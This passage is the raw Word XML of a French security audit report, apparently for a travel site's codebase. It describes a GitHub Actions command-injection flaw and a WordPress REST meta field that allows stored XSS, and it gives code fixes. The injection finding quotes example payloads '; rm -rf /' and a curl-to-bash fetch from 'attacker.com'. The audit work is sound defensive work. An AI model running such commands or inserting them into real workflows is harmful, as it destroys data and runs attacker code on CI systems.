                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  [Haute]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445566"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Sévérité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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2332"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Haute</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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445566"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Catégorie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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2332"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">CI/CD — Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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445566"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Fichier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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2332"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">.github/workflows/generate-seo-pages.yml</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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445566"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Ligne(s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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2332"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">58-65</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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445566"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Références</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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2332"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-78 — OS Command Injection, GitHub Security: Untrusted input, OWASP A03:2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A2332"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Les paramètres workflow_dispatch (template, destination) sont interpolés directement dans une commande shell bash sans assainissement ni guillemets. Un utilisateur ayant accès au déclenchement manuel du workflow peut injecter des commandes arbitraires (ex: ; rm -rf / ou ; curl attacker.com/exfil.sh | bash). Les valeurs ne sont pas mise entre guillemets doubles et aucune validation par whitelist n'est effectuée.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Preuve (extrait de code)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">if [ -n "${{ github.event.inputs.template }}" ]; then</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  ARGS="$ARGS --template ${{ github.event.inputs.template }}"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">fi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">if [ -n "${{ github.event.inputs.destination }}" ]; then</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  ARGS="$ARGS --dest ${{ github.event.inputs.destination }}"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">fi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Recommandation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A2332"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Passer les inputs par env: et valider par whitelist :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98C379"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">env:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  TEMPLATE: ${{ github.event.inputs.template }}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  DEST: ${{ github.event.inputs.destination }}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98C379"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">run: |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # Validation whitelist</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  if [[ ! "$TEMPLATE" =~ ^(vols|budget|visa|esim|)$ ]]; then</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    echo "Invalid template" &amp;&amp; exit 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  fi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  ARGS=""</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  [ -n "$TEMPLATE" ] &amp;&amp; ARGS="$ARGS --template $TEMPLATE"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  [ -n "$DEST" ] &amp;&amp; ARGS="$ARGS --dest $DEST"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="2"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2332" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">FV-003  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Métadonnée REST API fv_schema_json exposée sans auth_callback sur les pages</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFCC44"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  [Haute]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445566"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Sévérité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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2332"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Haute</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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445566"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Catégorie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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2332"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Autorisation / API WordPress</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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445566"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Fichier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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2332"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">wordpress/flashvoyage-widgets.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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445566"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Ligne(s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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2332"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">187-191</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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445566"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Références</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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2332"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-862 — Missing Authorization, OWASP A01:2021, CVE-2021-29450 (pattern similaire WP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A2332"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Le champ personnalisé fv_schema_json est enregistré pour les pages (post_type='page') via l'API REST WordPress sans auth_callback. Cela signifie que n'importe quel utilisateur authentifié (même sans rôle éditeur) peut écrire du JSON-LD arbitraire dans la métadonnée, qui sera ensuite injecté sans filtrage dans le &lt;head&gt; de la page comme balise &lt;script type="application/ld+json"&gt;. Cela crée un vecteur XSS stocké.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Preuve (extrait de code)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">register_post_meta( 'page', 'fv_schema_json', array(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    'show_in_rest'  =&gt; true,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    'single'        =&gt; true,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    'type'          =&gt; 'string',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    // MANQUE: auth_callback</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">) );</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Recommandation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A2332"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Ajouter un auth_callback restrictif et un sanitize_callback :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">register_post_meta( 'page', 'fv_schema_json', array(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    'show_in_rest'      =&gt; true,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    'single'            =&gt; true,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    'type'              =&gt; 'string',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    'auth_callback'     =&gt; function() { return current_user_can('edit_pages'); },</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    'sanitize_callback' =&gt; function( $value ) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
